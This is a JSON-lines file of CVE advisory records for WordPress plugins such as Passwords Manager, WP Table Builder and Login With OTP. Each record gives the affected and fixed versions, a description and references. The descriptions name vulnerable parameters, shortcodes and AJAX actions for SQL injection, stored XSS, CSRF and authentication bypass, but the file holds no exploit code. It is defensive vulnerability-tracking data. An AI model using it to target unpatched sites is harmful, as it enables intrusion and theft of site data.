{"CVE_ID":"CVE-2024-12615","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX actions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/admin-page\\\/addon\\\/csv-export\\\/index.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/admin-page\\\/addon\\\/csv-export\\\/index.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-categories-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-categories-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce8397d5-6637-4faa-be1f-9cf52c25be9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce8397d5-6637-4faa-be1f-9cf52c25be9b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12614","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pms_save_setting' and 'post_new_pass' AJAX actions in all versions up to, and including, 1.4.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins settings and add passwords.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-settings-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-settings-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/898c5554-fd02-47a2-a1f9-1c488cfab57e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/898c5554-fd02-47a2-a1f9-1c488cfab57e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12613","slug":"passwords-manager","versionImpact":"1.4.8","versionEndExcluding":"1.5.1","description":"The Passwords Manager plugin for WordPress is vulnerable to SQL Injection via the $wpdb->prefix value in several AJAX functions in all versions up to, and including, 1.4.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3221505\\\/passwords-manager\\\/trunk\\\/include\\\/pms-passwords-ajax-action.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec38992-a69f-4ccd-a23b-4dd1639897c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dec38992-a69f-4ccd-a23b-4dd1639897c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11341","slug":"eelv-redirection","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201717\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3201717\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa84344-8672-43e1-a430-094021f7366f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0fa84344-8672-43e1-a430-094021f7366f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3282","slug":"wp-table-builder","versionImpact":"1.5.0","versionEndExcluding":"1.5.1","description":"The WP Table Builder WordPress plugin through 1.5.0 does not sanitise and escape some of its Table data, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/12bf5e8e-24c9-48b9-b94c-c14ed60d7c15\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/12bf5e8e-24c9-48b9-b94c-c14ed60d7c15\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4715","slug":"structured-content","versionEndExcluding":"1.5.1","description":"The Structured Content WordPress plugin before 1.5.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4394fe86-4240-4454-b724-81464b04123a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4394fe86-4240-4454-b724-81464b04123a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4862","slug":"wpbits-addons-for-elementor","versionImpact":"1.5","versionEndExcluding":"1.5.1","description":"The WPBITS Addons For Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f459033-1c95-4781-93f4-1ee5e310933a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f459033-1c95-4781-93f4-1ee5e310933a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php#L560\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php#L560\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php#L868\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php#L868\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php#L716\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php#L716\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php#L2040\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php#L2040\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php#L824\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php#L824\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/business_hours.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/accordion.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/logo_grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/price_table.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3113578\\\/wpbits-addons-for-elementor\\\/trunk\\\/includes\\\/widgets\\\/tabs.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10482","slug":"media-library-tools","versionImpact":"1.4.0","versionEndExcluding":"1.5.0","description":"The Media File Rename, Find Unused File, Add Alt text, Caption, Desc For Image SEO  WordPress plugin before 1.5.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46cbd4bb-b6f3-49e8-8d79-8c378c617e7c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46cbd4bb-b6f3-49e8-8d79-8c378c617e7c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4444","slug":"woo-product-filter","versionImpact":"1.4.9","versionEndExcluding":"1.5.0","description":"The Product Filter by WooBeWoo plugin for WordPress is vulnerable to authorization bypass in versions up to, and including 1.4.9 due to missing authorization checks on various functions. This makes it possible for unauthenticated attackers to perform unauthorized actions such as creating new filters and injecting malicious javascript into a vulnerable site. This was actively exploited at the time of discovery.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30b6b0bf-e632-4e83-89ee-a424382534da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30b6b0bf-e632-4e83-89ee-a424382534da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2527958%40woo-product-filter&new=2527958%40woo-product-filter&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2527958%40woo-product-filter&new=2527958%40woo-product-filter&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11875","slug":"add-infos-to-the-events-calendar","versionImpact":"1.4.1","versionEndExcluding":"1.5.0","description":"The Add infos to the events calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fuss' shortcode in all versions up to, and including, 1.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.4.1\\\/add_shortcode_to_tec.php?rev=3205090\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.4.1\\\/add_shortcode_to_tec.php?rev=3205090\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.5.0\\\/add-infos-to-the-events-calendar.php?rev=3205090#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-infos-to-the-events-calendar\\\/tags\\\/1.5.0\\\/add-infos-to-the-events-calendar.php?rev=3205090#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f335839-73bc-4ede-9d86-6d8ff93cbecc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f335839-73bc-4ede-9d86-6d8ff93cbecc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47236","slug":"ipages-flipbook","versionEndExcluding":"1.5.0","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Avirtum iPages Flipbook For WordPress.This issue affects iPages Flipbook For WordPress: from n\/a through 1.4.8.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipages-flipbook\\\/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ipages-flipbook\\\/wordpress-ipages-flipbook-for-wordpress-plugin-1-4-8-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12518","slug":"shmapper-by-teplitsa","versionImpact":"1.4.18","versionEndExcluding":"1.5.0","description":"The ShMapper by Teplitsa plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shmMap' shortcode in all versions up to, and including, 1.4.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211065\\\/shmapper-by-teplitsa\\\/trunk\\\/shortcode\\\/shmMap.shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211065\\\/shmapper-by-teplitsa\\\/trunk\\\/shortcode\\\/shmMap.shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e2a443-381c-46cd-85c7-20716f4e59c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e2a443-381c-46cd-85c7-20716f4e59c1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4169","slug":"posts-per-cat","versionImpact":"1.4.2","versionEndExcluding":"1.5.0","description":"The Posts per Cat [Unmaintained plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ppc' shortcode in all versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3292123%40posts-per-cat&new=3292123%40posts-per-cat&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3292123%40posts-per-cat&new=3292123%40posts-per-cat&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb60874-85c1-40a9-b19d-131c2c2d49ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7eb60874-85c1-40a9-b19d-131c2c2d49ba?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6027","slug":"themify-wc-product-filter","versionImpact":"1.4.9","versionEndExcluding":"1.5.0","description":"The Themify \u2013 WooCommerce Product Filter plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018conditions\u2019 parameter in all versions up to, and including, 1.4.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451db756-9d62-4c8e-b735-e5e5207b81e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/451db756-9d62-4c8e-b735-e5e5207b81e3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-wc-product-filter\\\/trunk\\\/public\\\/class-wpf-public.php#L604\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/themify-wc-product-filter\\\/trunk\\\/public\\\/class-wpf-public.php#L604\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themify.org\\\/changelogs\\\/themify-wc-product-filter.txt\",\"name\":\"https:\\\/\\\/themify.org\\\/changelogs\\\/themify-wc-product-filter.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104239%40themify-wc-product-filter%2Ftrunk&old=3100861%40themify-wc-product-filter%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3104239%40themify-wc-product-filter%2Ftrunk&old=3100861%40themify-wc-product-filter%2Ftrunk&sfp_email=&sfph_mail=#file2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23646","slug":"new-album-gallery","versionEndExcluding":"1.5.0","description":"Cross-Site Request Forgery (CSRF) vulnerability in A WP Life Album Gallery \u2013 WordPress Gallery plugin <=\u00a01.4.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-4-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/new-album-gallery\\\/wordpress-album-gallery-wordpress-gallery-plugin-1-4-9-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13642","slug":"stratum","versionImpact":"1.4.7","versionEndExcluding":"1.5.0","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Image Hotspot widget in all versions up to, and including, 1.4.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228058#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3228058#file6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ccaee26-277e-4730-8242-9b5e6a281fcc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ccaee26-277e-4730-8242-9b5e6a281fcc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43125","slug":"wp-table-builder","versionImpact":"1.4.15","versionEndExcluding":"1.5.0","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WP Table Builder WP Table Builder \u2013 WordPress Table Plugin allows Stored XSS.This issue affects WP Table Builder \u2013 WordPress Table Plugin: from n\/a through 1.4.15.","recommendation":"Update to version 1.5.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-table-builder\\\/wordpress-wp-table-builder-plugin-1-4-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-table-builder\\\/wordpress-wp-table-builder-plugin-1-4-15-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10689","slug":"xl-tab","versionImpact":"1.4","versionEndExcluding":"1.5","description":"The XLTab \u2013 Accordions and Tabs for Elementor Page Builder plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4 via the 'XLTAB_INSERT_TPL' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190826%40xl-tab&new=3190826%40xl-tab&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3190826%40xl-tab&new=3190826%40xl-tab&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dbf8c216-aedd-4db9-aaa4-61bc0d7850cb?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36715","slug":"easy-login-woocommerce","versionEndExcluding":"1.5","description":"The Login\/Signup Popup plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on several functions in versions up to, and including, 1.4. This makes it possible for authenticated attackers to inject arbitrary web scripts into the plugin settings that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96d264fe-e7e1-4eec-b235-9d288bc5a22f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/96d264fe-e7e1-4eec-b235-9d288bc5a22f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-login-signup-popup-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/zero-day-vulnerability-fixed-in-wordpress-login-signup-popup-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2304979\\\/easy-login-woocommerce\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2304979\\\/easy-login-woocommerce\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11178","slug":"otp-login","versionImpact":"1.4.2","versionEndExcluding":"1.5","description":"The Login With OTP plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.4.2. This is due to the plugin generating too weak OTP, and there\u2019s no attempt or time limit. This makes it possible for unauthenticated attackers to generate and brute force the 6-digit numeric OTP that makes it possible to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L293\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L293\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L317\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/otp-login\\\/tags\\\/1.4.2\\\/lib\\\/otpl-class.php#L317\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3775d48-5985-475e-8fb9-c4c5fd044772?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3775d48-5985-475e-8fb9-c4c5fd044772?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-3891","slug":"wp-fullcalendar","versionEndExcluding":"1.5","description":"The WP FullCalendar WordPress plugin before 1.5 does not ensure that the post retrieved via an AJAX action is public and can be accessed by the user making the request, allowing unauthenticated attackers to get the content of arbitrary posts, including draft\/private as well as password-protected ones.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a69965d-d243-4d51-b7a4-d6f4b199abf1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5a69965d-d243-4d51-b7a4-d6f4b199abf1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6271","slug":"community-events","versionImpact":"1.4.9","versionEndExcluding":"1.5","description":"The Community Events WordPress plugin before 1.5 does not have CSRF check in place when deleting events, which could allow attackers to make a logged in admin delete arbitrary events via a CSRF attack","recommendation":"Update to version 1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44d9d085-34cb-490f-a3f5-f9eafae85ab8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/44d9d085-34cb-490f-a3f5-f9eafae85ab8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
